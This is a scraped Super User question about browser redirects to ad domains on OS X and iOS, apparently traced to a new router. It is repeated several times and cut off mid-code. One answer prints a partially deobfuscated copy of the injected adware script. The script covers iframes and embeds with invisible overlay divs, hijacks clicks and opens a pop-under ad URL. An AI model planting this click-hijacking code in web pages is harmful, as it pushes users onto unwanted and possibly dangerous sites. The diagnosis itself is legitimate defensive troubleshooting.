How to get rid of viruses, which redirect you to gocloudly/goac on OS X and maxonclick/ on iOS?
1
I faced with a problem which now annoys me very hard. During the last few days from time to time I was redirected visiting my ordinary list of websites. Googling didn't help too much, because whether the solution is for Windows users, whether it is just another link to download a malware.
Redirection to gocloudly/goac:
OS X El Capitan (v 10.11.6) | Google Chrome (v 52.0.2743.116) (screenshot from chrome history)
Shows a confirm popup which says that my software is not up to date and asks to download it.
- I've already checked my chrome://extensions/ - there is nothing unusual.
- Also I checked my hosts file and also there is nothing wrong.
- Cleared history and browsing data.
Redirection to maxonclick/and-other-lots-of-redirections-from-here: iOS (v 9.3.5) | Safari
Random redirections.
- Cleared history and browsing data.
- Turned off JavaScript (it helped but actually the problem is not solved, turning it on will cause the same behaviour).
UPDATE:
- Disconnected from home network within iPhone
- Cleared Safari cache.
- Connected with mobile internet and the redirection disappeared, so it's clearly that problem is not with those devices and their software.
google-chrome browser virus redirection safari
edited Sep 20 '16 at 13:40
Tonin
578520
asked Aug 27 '16 at 14:11
mekatedmekated
614
add a comment |
1
I faced with a problem which now annoys me very hard. During the last few days from time to time I was redirected visiting my ordinary list of websites. Googling didn't help too much, because whether the solution is for Windows users, whether it is just another link to download a malware.
Redirection to gocloudly/goac:
OS X El Capitan (v 10.11.6) | Google Chrome (v 52.0.2743.116) (screenshot from chrome history)
Shows a confirm popup which says that my software is not up to date and asks to download it.
- I've already checked my chrome://extensions/ - there is nothing unusual.
- Also I checked my hosts file and also there is nothing wrong.
- Cleared history and browsing data.
Redirection to maxonclick/and-other-lots-of-redirections-from-here: iOS (v 9.3.5) | Safari
Random redirections.
- Cleared history and browsing data.
- Turned off JavaScript (it helped but actually the problem is not solved, turning it on will cause the same behaviour).
UPDATE:
- Disconnected from home network within iPhone
- Cleared Safari cache.
- Connected with mobile internet and the redirection disappeared, so it's clearly that problem is not with those devices and their software.
google-chrome browser virus redirection safari
edited Sep 20 '16 at 13:40
Tonin
578520
asked Aug 27 '16 at 14:11
mekatedmekated
614
If two different browsers on two devices show this behavior, then I'd suspect your network/modem/router.
– Arjan
Aug 27 '16 at 14:49
@Arjan I changed my router about a week ago and as I remember these problems showed up in this period. Will try to test it. Thank you for your advice.
– mekated
Aug 27 '16 at 15:24
Check your DNS settings on your new router and look if there isn't a firmware upgrade for your router.
– Tonin
Sep 20 '16 at 10:45
add a comment |
1
1
1
I faced with a problem which now annoys me very hard. During the last few days from time to time I was redirected visiting my ordinary list of websites. Googling didn't help too much, because whether the solution is for Windows users, whether it is just another link to download a malware.
Redirection to gocloudly/goac:
OS X El Capitan (v 10.11.6) | Google Chrome (v 52.0.2743.116) (screenshot from chrome history)
Shows a confirm popup which says that my software is not up to date and asks to download it.
- I've already checked my chrome://extensions/ - there is nothing unusual.
- Also I checked my hosts file and also there is nothing wrong.
- Cleared history and browsing data.
Redirection to maxonclick/and-other-lots-of-redirections-from-here: iOS (v 9.3.5) | Safari
Random redirections.
- Cleared history and browsing data.
- Turned off JavaScript (it helped but actually the problem is not solved, turning it on will cause the same behaviour).
UPDATE:
- Disconnected from home network within iPhone
- Cleared Safari cache.
- Connected with mobile internet and the redirection disappeared, so it's clearly that problem is not with those devices and their software.
google-chrome browser virus redirection safari
edited Sep 20 '16 at 13:40
Tonin
578520
asked Aug 27 '16 at 14:11
mekatedmekated
614
I faced with a problem which now annoys me very hard. During the last few days from time to time I was redirected visiting my ordinary list of websites. Googling didn't help too much, because whether the solution is for Windows users, whether it is just another link to download a malware.
Redirection to gocloudly/goac:
OS X El Capitan (v 10.11.6) | Google Chrome (v 52.0.2743.116) (screenshot from chrome history)
Shows a confirm popup which says that my software is not up to date and asks to download it.
- I've already checked my chrome://extensions/ - there is nothing unusual.
- Also I checked my hosts file and also there is nothing wrong.
- Cleared history and browsing data.
Redirection to maxonclick/and-other-lots-of-redirections-from-here: iOS (v 9.3.5) | Safari
Random redirections.
- Cleared history and browsing data.
- Turned off JavaScript (it helped but actually the problem is not solved, turning it on will cause the same behaviour).
UPDATE:
- Disconnected from home network within iPhone
- Cleared Safari cache.
- Connected with mobile internet and the redirection disappeared, so it's clearly that problem is not with those devices and their software.
google-chrome browser virus redirection safari
google-chrome browser virus redirection safari
edited Sep 20 '16 at 13:40
Tonin
578520
asked Aug 27 '16 at 14:11
mekatedmekated
614
edited Sep 20 '16 at 13:40
Tonin
578520
asked Aug 27 '16 at 14:11
mekatedmekated
614
edited Sep 20 '16 at 13:40
Tonin
578520
edited Sep 20 '16 at 13:40
Tonin
578520
edited Sep 20 '16 at 13:40
Tonin
578520
578520
asked Aug 27 '16 at 14:11
mekatedmekated
614
asked Aug 27 '16 at 14:11
mekatedmekated
614
asked Aug 27 '16 at 14:11
mekatedmekated
614
614
If two different browsers on two devices show this behavior, then I'd suspect your network/modem/router.
– Arjan
Aug 27 '16 at 14:49
@Arjan I changed my router about a week ago and as I remember these problems showed up in this period. Will try to test it. Thank you for your advice.
– mekated
Aug 27 '16 at 15:24
Check your DNS settings on your new router and look if there isn't a firmware upgrade for your router.
– Tonin
Sep 20 '16 at 10:45
add a comment |
If two different browsers on two devices show this behavior, then I'd suspect your network/modem/router.
– Arjan
Aug 27 '16 at 14:49
@Arjan I changed my router about a week ago and as I remember these problems showed up in this period. Will try to test it. Thank you for your advice.
– mekated
Aug 27 '16 at 15:24
Check your DNS settings on your new router and look if there isn't a firmware upgrade for your router.
– Tonin
Sep 20 '16 at 10:45
If two different browsers on two devices show this behavior, then I'd suspect your network/modem/router.
– Arjan
Aug 27 '16 at 14:49
If two different browsers on two devices show this behavior, then I'd suspect your network/modem/router.
– Arjan
Aug 27 '16 at 14:49
@Arjan I changed my router about a week ago and as I remember these problems showed up in this period. Will try to test it. Thank you for your advice.
– mekated
Aug 27 '16 at 15:24
@Arjan I changed my router about a week ago and as I remember these problems showed up in this period. Will try to test it. Thank you for your advice.
– mekated
Aug 27 '16 at 15:24
Check your DNS settings on your new router and look if there isn't a firmware upgrade for your router.
– Tonin
Sep 20 '16 at 10:45
Check your DNS settings on your new router and look if there isn't a firmware upgrade for your router.
– Tonin
Sep 20 '16 at 10:45
add a comment |
1 Answer
1
active
oldest
votes
0
My quick patch to this problem was to block any DNS request to that domain.
This does not (probably) solve the problem at the root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in
httprequests, - they intercept any first click bubbling to the
<html>tag, - they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.
I've partially beautified it below:
var PPid = "p20161003pr";
var PPRet = ;
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? : PPbl.split(" ");
PPwl = PPwl == "" ? : PPwl.split(" ");
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
l = _0x50e8x14 == "w" ? PPwl : PPbl;
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
;delete l;
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
cookieStartIndex += 2
}
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
;PPac = PPnCL()
}
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
try {
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
function bcStart() {
if (!startScript) {
startScript = !0;
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
document.getElementsByClassName = function(className) {
var matchingElements = ;
className = new RegExp("b" + className + "b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
add a comment |
Your Answer
StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "3"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);
StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});
function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: true,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: 10,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});
}
});
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Required, but never shown
StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsuperuser.com%2fquestions%2f1118258%2fhow-to-get-rid-of-viruses-which-redirect-you-to-gocloudly-goac-on-os-x-and-maxo%23new-answer', 'question_page');
}
);
Post as a guest
Required, but never shown
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
0
My quick patch to this problem was to block any DNS request to that domain.
This does not (probably) solve the problem at the root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in
httprequests, - they intercept any first click bubbling to the
<html>tag, - they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.
I've partially beautified it below:
var PPid = "p20161003pr";
var PPRet = ;
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? : PPbl.split(" ");
PPwl = PPwl == "" ? : PPwl.split(" ");
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
l = _0x50e8x14 == "w" ? PPwl : PPbl;
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
;delete l;
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
cookieStartIndex += 2
}
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
;PPac = PPnCL()
}
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
try {
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
document.body.appendChild(mtadDivElement)
}
}
}
} catch (e) {}
}
function bcStart() {
if (!startScript) {
startScript = !0;
PPcc = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : 0;
while (PPcl.length > 0) {
PPac = PPnCL();
if (PPac > PPcc) {
break
}
}
;PPcl.length == 0 && PPac <= PPcc && (PPac = false);
if (PPdef(PPRet)) {
if (PPRet.length > 0) {
var _0x50e8x2f = "";
for (var _0x50e8x23 = 0; _0x50e8x23 < PPRet.length; _0x50e8x23++) {
_0x50e8x2f = _0x50e8x2f + "&" + PPRet[_0x50e8x23]
}
;urlOfDamnation = urlOfDamnation + _0x50e8x2f
}
}
;(PPcc == PPac - 1 && PPac) && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
for (var _0x50e8x20 = PPbl, _0x50e8x21 = _0x50e8x20.length, _0x50e8x2a = 0; _0x50e8x2a < _0x50e8x21; _0x50e8x2a++) {
var _0x50e8x2c = document.getElementById(_0x50e8x20[_0x50e8x2a]);
null != _0x50e8x2c && (_0x50e8x2c.onmouseup = function(_0x50e8x18) {
_0x50e8x18 = _0x50e8x18 || window.event;
_0x50e8x18.stopPropagation ? _0x50e8x18.stopPropagation() : _0x50e8x18.cancelBubble = !0
}
)
}
;if (PPwl.length > 0) {
for (_0x50e8x23 = 0; _0x50e8x23 < PPwl.length; _0x50e8x23++) {
var _0x50e8x22 = document.getElementById(PPwl[_0x50e8x23]);
_0x50e8x22 != null && attachOpenNewTabOnClick(_0x50e8x22)
}
} else {
attachOpenNewTabOnClick(document)
}
}
}
var startTimeout = setTimeout(bcStart, 3000)
, startScript = null ;
if ("function" == typeof window.addEventListener) {
window.addEventListener("load", function() {
clearInterval(startTimeout);
bcStart()
}, !1)
} else {
try {
window.attachEvent("onload", function() {
clearInterval(startTimeout);
bcStart()
})
} catch (D) {}
}
document.getElementsByClassName = function(className) {
var matchingElements = ;
className = new RegExp("b" + className + "b");
for (var allDOMElements = this.getElementsByTagName("*"), index = 0; index < allDOMElements.length; index++) {
if (className.test(allDOMElements[index].className)) {
matchingElements.push(allDOMElements[index])
}
}
;return matchingElements
}
answered Oct 16 '16 at 17:43
Enoah NetzachEnoah Netzach
101
how can i block a request for a particular domain ? could you please elaborate this one ?
– Prateek Jain
Dec 25 '16 at 8:54
add a comment |
0
My quick patch to this problem was to block any DNS request to that domain.
This does not (probably) solve the problem at the root, but for now it seems to work.
Some things I've noticed are:
- it happens both on my computer and my phone, and on different networks,
- the malicious scripts are injected only in
httprequests, - they intercept any first click bubbling to the
<html>tag, - they seem to be injected through multiple sources (google tag manager, google tag services and platform.twitter.com, that I'm aware of).
The script by itself doesn't looks dangerous, it just makes you open a new page with ads and potentially dangerous clickbaits.
I've partially beautified it below:
var PPid = "p20161003pr";
var PPRet = ;
var userAgent = navigator.userAgent.toLowerCase();
var isOpera = -1 != userAgent.indexOf("opera");
var isChrome = -1 != userAgent.indexOf("chrome");
var PPdl = "3";
var PPbl = "";
var PPwl = "";
var PPmw = 450;
var urlOfDamnation = "https://goo.gl/Vjh91p";
var PPcl = [1].sort();
var PPcc = 0;
var PPac;
PPbl = PPbl == "" ? : PPbl.split(" ");
PPwl = PPwl == "" ? : PPwl.split(" ");
function PPdef(_0x50e8x14) {
return (typeof (_0x50e8x14) == "undefined") ? false : true
}
function chPrnt(_0x50e8x19, _0x50e8x14) {
var _0x50e8x17 = false;
if (_0x50e8x19 != null ) {
l = _0x50e8x14 == "w" ? PPwl : PPbl;
if (l.length > 0) {
for (var _0x50e8x18 = 0; _0x50e8x18 < l.length; _0x50e8x18++) {
if (_0x50e8x19.id == PPbl[_0x50e8x18]) {
_0x50e8x17 = true;
break
}
}
;delete l;
!_0x50e8x17 && (_0x50e8x17 = chPrnt(_0x50e8x19.parentNode, _0x50e8x14))
}
}
;return _0x50e8x17
}
function attachOpenNewTabOnClick() {
if (document.attachEvent) {
document.attachEvent("onclick", openNewTab)
} else {
if (document.addEventListener) {
document.addEventListener("click", openNewTab, false)
}
}
}
function PPnCL() {
return (PPcl.length > 0) ? PPcl.shift() : false
}
function setV(_0x50e8x20, _0x50e8x21) {
var _0x50e8x22 = PPdl
, _0x50e8x23 = new Date;
_0x50e8x23.setTime(_0x50e8x23.getTime())
}
function getCookieValue(cookieKey) {
var cookies = document.cookie;
cookieKey += "=";
var cookieStartIndex = cookies.indexOf("; " + cookieKey);
if (-1 == cookieStartIndex) {
cookieStartIndex = cookies.indexOf(cookieKey);
if (0 != cookieStartIndex) {
return null
}
} else {
cookieStartIndex += 2
}
var cookieEndIndex = cookies.indexOf(";", cookieStartIndex);
if (-1 == cookieEndIndex) {
(cookieEndIndex = cookies.length);
}
return unescape(cookies.substring(cookieStartIndex + cookieKey.length, cookieEndIndex))
}
function openNewTab() {
var _0x50e8x14 = getCookieValue("PP_CL" + PPid) ? parseInt(getCookieValue("PP_CL" + PPid)) : PPcc;
_0x50e8x14++;
PPac !== false && (setV("PP_CL" + PPid, _0x50e8x14));
if (!getCookieValue("PP_ID" + PPid + "." + PPac) && _0x50e8x14 == PPac) {
setV("PP_ID" + PPid + "." + PPac, 1);
if (document.createEvent && (isOpera || isChrome)) {
var _0x50e8x18 = document.createElement("a");
_0x50e8x18.href = urlOfDamnation;
_0x50e8x18.target = "_blank";
var _0x50e8x19 = document.createEvent("MouseEvents");
_0x50e8x19.initMouseEvent("click", !0, !0, window, 1, 0, 0, 0, 0, !0, !1, !1, !1, 1, null );
_0x50e8x18.dispatchEvent(_0x50e8x19)
} else {
_0x50e8x18 = window.open("about:blank", "win" + Math.floor(9999999 * Math.random()) + 1, "toolbar=0,scrollbars=1,location=1,statusbar=1,menubar=0,resizable=1,top=0,left=0,width=" + window.screen.width + "px,height=" + window.screen.height + "px");
with (_0x50e8x18) {
opener.window.focus(),
_0x50e8x18.location = urlOfDamnation,
"undefined" != typeof window.mozPaintCount && window.open("about:blank").close()
}
}
;for (var _0x50e8x18 = document.getElementsByClassName("mtaddiv"), _0x50e8x19 = _0x50e8x18.length, _0x50e8x17 = 0; _0x50e8x17 < _0x50e8x19; _0x50e8x17++) {
"object" == typeof _0x50e8x18[_0x50e8x17] && _0x50e8x18[_0x50e8x17].setAttribute("style", "position:none;left:0px;top:0px;height:0;width:0;z-index:0;display:none;")
}
;PPac = PPnCL()
}
;_0x50e8x14 == PPac - 1 && (addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("iframe"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("object"),
addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick("embed"));
PPcc = _0x50e8x14
}
function addMtadDivElementOnTopOfTagElementsAndAttachOpenNewTabOnClick(tagName) {
try {
if (!getCookieValue("PP_ID" + PPid + "." + PPac)) {
var elements = document.getElementsByTagName(tagName);
var elementsCount = elements.length;
for (var index = 0; index < elementsCount; index++) {
var elementOffsetWidth = elements[index].offsetWidth;
var elementOffsetHeight = elements[index].offsetHeight;
var check = true;
if (PPwl.length > 0 && !chPrnt(elements[index], "w")) {
check = false;
}
if (check && (PPbl.length > 0 && chPrnt(elements[index], "b"))) {
check = false;
}
if (elementOffsetWidth > PPmw && check) {
var mtadDivElement = document.createElement("div");
mtadDivElement.className = "mtaddiv";
var elementDimensions = elements[index].getBoundingClientRect();
var dimensions = {
top: Math.round(elementDimensions.top + (window.pageYOffset || (document.documentElement.scrollTop || document.body.scrollTop)) - (document.documentElement.clientTop || (document.body.clientTop || 0))),
left: Math.round(elementDimensions.left + (window.pageXOffset || (document.documentElement.scrollLeft || document.body.scrollLeft)) - (document.documentElement.clientLeft || (document.body.clientLeft || 0)))
};
mtadDivElement.setAttribute("style", "position: absolute;left:" + dimensions.left + "px;top:" + dimensions.top + "px;height:" + elementOffsetHeight + "px;width:" + elementOffsetWidth + "px;z-index:899");
if (PPwl.length > 0) {
attachOpenNewTabOnClick(mtadDivElement);
}
